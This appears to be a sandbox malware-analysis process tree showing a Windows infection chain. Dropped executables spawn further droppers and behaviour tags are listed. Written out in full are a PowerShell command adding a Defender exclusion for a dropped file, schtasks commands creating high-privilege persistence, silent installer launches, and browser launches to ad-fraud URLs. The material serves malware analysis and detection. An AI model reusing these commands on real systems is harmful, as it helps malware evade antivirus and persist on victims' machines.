C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1596,16367517705662080233,4095617530529455376,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10904_608240103" --mojo-platform-channel-handle=2820 /prefetch:812⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"9⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7076 -s 190010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7076 -s 190010⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\28.exe"C:\Users\Admin\AppData\Local\Temp\28.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"10⤵
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"9⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5388 -s 224010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"C:\Users\Admin\AppData\Local\Temp\Chrome4 8KB.exe"9⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe"C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe"7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1e0c28f7-79f6-4632-81fa-79b38135003f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\1e0c28f7-79f6-4632-81fa-79b38135003f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1e0c28f7-79f6-4632-81fa-79b38135003f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1e0c28f7-79f6-4632-81fa-79b38135003f\test.bat"9⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe" -Force8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe"C:\Users\Admin\Pictures\Adobe Films\IMyFCJUgJ9GhCKD0v0c9wv0b.exe"8⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NNPY5106AAeVqilK_z_F08rO.exe"C:\Users\Admin\Pictures\Adobe Films\NNPY5106AAeVqilK_z_F08rO.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 2048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_tMp9XngZstVdtUhqc8dTUA1.exe"C:\Users\Admin\Pictures\Adobe Films\_tMp9XngZstVdtUhqc8dTUA1.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\POhZnp_zz8JHALLWt8sLBpym.exe"C:\Users\Admin\Pictures\Adobe Films\POhZnp_zz8JHALLWt8sLBpym.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\9CX5qmuakiAzyoicv8wnw7ta.exe"C:\Users\Admin\Pictures\Adobe Films\9CX5qmuakiAzyoicv8wnw7ta.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 2808⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1hR0WedLFCi2ffiQp2FL4Pi2.exe"C:\Users\Admin\Pictures\Adobe Films\1hR0WedLFCi2ffiQp2FL4Pi2.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\Pictures\Adobe Films\nvqVMx4So_nVmBVhfMm_C75A.exe"C:\Users\Admin\Pictures\Adobe Films\nvqVMx4So_nVmBVhfMm_C75A.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\nvqVMx4So_nVmBVhfMm_C75A.exe"C:\Users\Admin\Pictures\Adobe Films\nvqVMx4So_nVmBVhfMm_C75A.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PewpsFfSYiXuOGiFJvSIGG6e.exe"C:\Users\Admin\Pictures\Adobe Films\PewpsFfSYiXuOGiFJvSIGG6e.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\GZXD3irWc3TtUE5pa8tfTilC.exe"C:\Users\Admin\Pictures\Adobe Films\GZXD3irWc3TtUE5pa8tfTilC.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\svchost.exesvchost.exe8⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Benvenuta.wmv8⤵
-
C:\Windows\SysWOW64\cmd.execmd9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^cumYgySQBgxPdjFKcKawUwBIsAmBYzAvcYxZIAEmtYNfVBRWjWqBCNmzERHNFdSiOXxsRGwVuTWVhjNPJDfwzYUHnqxRTQTNuGAXimtGVt$" Allora.wmv10⤵
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.110⤵
- Runs ping.exe
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comAltrove.exe.com e10⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Altrove.exe.com e11⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mb2UC8iI_0pul48ZjDuP1Fip.exe"C:\Users\Admin\Pictures\Adobe Films\mb2UC8iI_0pul48ZjDuP1Fip.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"8⤵
-
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WY3JcH0zxuXuKZ0x9hFnf2GO.exe"C:\Users\Admin\Pictures\Adobe Films\WY3JcH0zxuXuKZ0x9hFnf2GO.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\BAJsVPm1_iONxhvXOXHtjEzv.exe"C:\Users\Admin\Pictures\Adobe Films\BAJsVPm1_iONxhvXOXHtjEzv.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3480205.exe"C:\Users\Admin\AppData\Roaming\3480205.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\28745.exe"C:\Users\Admin\AppData\Roaming\28745.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\1382360.exe"C:\Users\Admin\AppData\Roaming\1382360.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\3235482.exe"C:\Users\Admin\AppData\Roaming\3235482.exe"8⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\o4mHnIgSYQW7O5XO3gGRoCgQ.exe"C:\Users\Admin\Pictures\Adobe Films\o4mHnIgSYQW7O5XO3gGRoCgQ.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\OX41VEAQ6EuszyqVhhGIceuv.exe"C:\Users\Admin\Documents\OX41VEAQ6EuszyqVhhGIceuv.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\DnMDKAawQTsPYfrL4e2YEVdQ.exe"C:\Users\Admin\Pictures\Adobe Films\DnMDKAawQTsPYfrL4e2YEVdQ.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
-
-
C:\Users\Admin\Pictures\Adobe Films\unfr1fjq_KZVF_OkLYptkGos.exe"C:\Users\Admin\Pictures\Adobe Films\unfr1fjq_KZVF_OkLYptkGos.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 24010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rCdaGjHFWKZozXiMoUG92tz1.exe"C:\Users\Admin\Pictures\Adobe Films\rCdaGjHFWKZozXiMoUG92tz1.exe"9⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\nmEyKjzfrHBJARXEBKdYBLhv.exe"C:\Users\Admin\Pictures\Adobe Films\nmEyKjzfrHBJARXEBKdYBLhv.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 24410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\EbytEU0df8drCuiqnG3K33RD.exe"C:\Users\Admin\Pictures\Adobe Films\EbytEU0df8drCuiqnG3K33RD.exe"9⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\AyFIvjKH4jwa3om1gX3zW4hH.exe"C:\Users\Admin\Pictures\Adobe Films\AyFIvjKH4jwa3om1gX3zW4hH.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\AyFIvjKH4jwa3om1gX3zW4hH.exe"C:\Users\Admin\Pictures\Adobe Films\AyFIvjKH4jwa3om1gX3zW4hH.exe" -u10⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\27XBbIsnRU1jbg5LLXRcCgLl.exe"C:\Users\Admin\Pictures\Adobe Films\27XBbIsnRU1jbg5LLXRcCgLl.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VD1VA.tmp\27XBbIsnRU1jbg5LLXRcCgLl.tmp"C:\Users\Admin\AppData\Local\Temp\is-VD1VA.tmp\27XBbIsnRU1jbg5LLXRcCgLl.tmp" /SL5="$302CA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\27XBbIsnRU1jbg5LLXRcCgLl.exe"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-5TM97.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-5TM97.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\c0-7631c-720-c409c-7877d4289d0cc\Mushulegyfo.exe"C:\Users\Admin\AppData\Local\Temp\c0-7631c-720-c409c-7877d4289d0cc\Mushulegyfo.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mgqjq35b.nhj\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\mgqjq35b.nhj\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\mgqjq35b.nhj\GcleanerEU.exe /eufive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 24015⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxquj5i0.p0c\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\vxquj5i0.p0c\installer.exeC:\Users\Admin\AppData\Local\Temp\vxquj5i0.p0c\installer.exe /qn CAMPAIGN="654"14⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exe & exit13⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exeC:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exe"C:\Users\Admin\AppData\Local\Temp\qkcthirh.nro\any.exe" -u15⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uffxcdbl.feh\gcleaner.exe /mixfive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\uffxcdbl.feh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\uffxcdbl.feh\gcleaner.exe /mixfive14⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8624 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x4cv0vb4.jhy\autosubplayer.exe /S & exit13⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\iobLg91vZLvEF8kRC30NiwUs.exe"C:\Users\Admin\Pictures\Adobe Films\iobLg91vZLvEF8kRC30NiwUs.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff9fb8cdec0,0x7ff9fb8cded0,0x7ff9fb8cdee012⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,9060873892041092508,5059064109560065603,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11772_1480536409" --mojo-platform-channel-handle=1720 /prefetch:812⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wmOHBUlmJYRTjQx5I_08gsQ9.exe"C:\Users\Admin\Pictures\Adobe Films\wmOHBUlmJYRTjQx5I_08gsQ9.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=18⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"9⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff9fb8cdec0,0x7ff9fb8cded0,0x7ff9fb8cdee010⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff65a4e9e70,0x7ff65a4e9e80,0x7ff65a4e9e9011⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,6470524122622578317,12390171341293858774,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11236_670610193" --mojo-platform-channel-handle=1740 /prefetch:810⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WVl9U240Z3iuGFJtZ_uUW87k.exe"C:\Users\Admin\Pictures\Adobe Films\WVl9U240Z3iuGFJtZ_uUW87k.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-AM0G4.tmp\WVl9U240Z3iuGFJtZ_uUW87k.tmp"C:\Users\Admin\AppData\Local\Temp\is-AM0G4.tmp\WVl9U240Z3iuGFJtZ_uUW87k.tmp" /SL5="$20274,506127,422400,C:\Users\Admin\Pictures\Adobe Films\WVl9U240Z3iuGFJtZ_uUW87k.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-6LDFJ.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-6LDFJ.tmp\DYbALA.exe" /S /UID=27109⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Common Files\MWUMGVDMQL\foldershare.exe"C:\Program Files\Common Files\MWUMGVDMQL\foldershare.exe" /VERYSILENT10⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ef-ce0f3-534-0a4a3-d31003a68c318\Qitiluhyta.exe"C:\Users\Admin\AppData\Local\Temp\ef-ce0f3-534-0a4a3-d31003a68c318\Qitiluhyta.exe"10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵
- Executes dropped EXE
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151311⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721511⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311911⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e42946f8,0x7ff9e4294708,0x7ff9e429471812⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a2-40300-3b3-704a0-9737570e4aab2\Pyshomemihe.exe"C:\Users\Admin\AppData\Local\Temp\a2-40300-3b3-704a0-9737570e4aab2\Pyshomemihe.exe"10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lu2hkv3m.pmb\GcleanerEU.exe /eufive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\lu2hkv3m.pmb\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\lu2hkv3m.pmb\GcleanerEU.exe /eufive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 552 -s 18813⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y2p3ean5.v1h\installer.exe /qn CAMPAIGN="654" & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\y2p3ean5.v1h\installer.exeC:\Users\Admin\AppData\Local\Temp\y2p3ean5.v1h\installer.exe /qn CAMPAIGN="654"12⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tuvhskyo.rdy\any.exe & exit11⤵
-
